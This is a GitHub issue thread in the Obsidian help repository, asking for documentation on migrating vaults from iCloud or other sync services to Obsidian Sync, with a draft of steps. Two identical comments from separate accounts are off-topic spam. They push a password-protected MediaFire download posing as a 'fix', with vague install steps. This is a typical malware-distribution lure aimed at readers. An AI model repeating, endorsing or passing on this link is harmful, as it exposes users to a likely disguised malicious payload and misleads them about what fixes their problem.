### ISSUE TITLE
Add instructions for migrating from other services to Sync

### ISSUE THREAD

**Issue by colintedford** [obsidianmd/obsidian-help#801]
Help warns against using Sync with another sync service, but it would be helpful to detail what needs to be done to move from another service to Sync. 

As a very rough draft, here's what I told a user:

>  You'll need to move the vault out of iCloud. On desktop, in the vault manager, in the many for the vault, choose the Move option (the vault will need to be closed, so do that after opening the vault manager). On mobile I'm not sure of the exact prep needed — you may be able to use Files to move the vault from iCloud > Obsidian to My iPhone > Obsidian, or you may need to set it up fresh and then remove the iCloud one. Once the vault is out of iCloud you can proceed with the link above.

**Comment by AnaSousa314** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by mohamed-elsankary** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
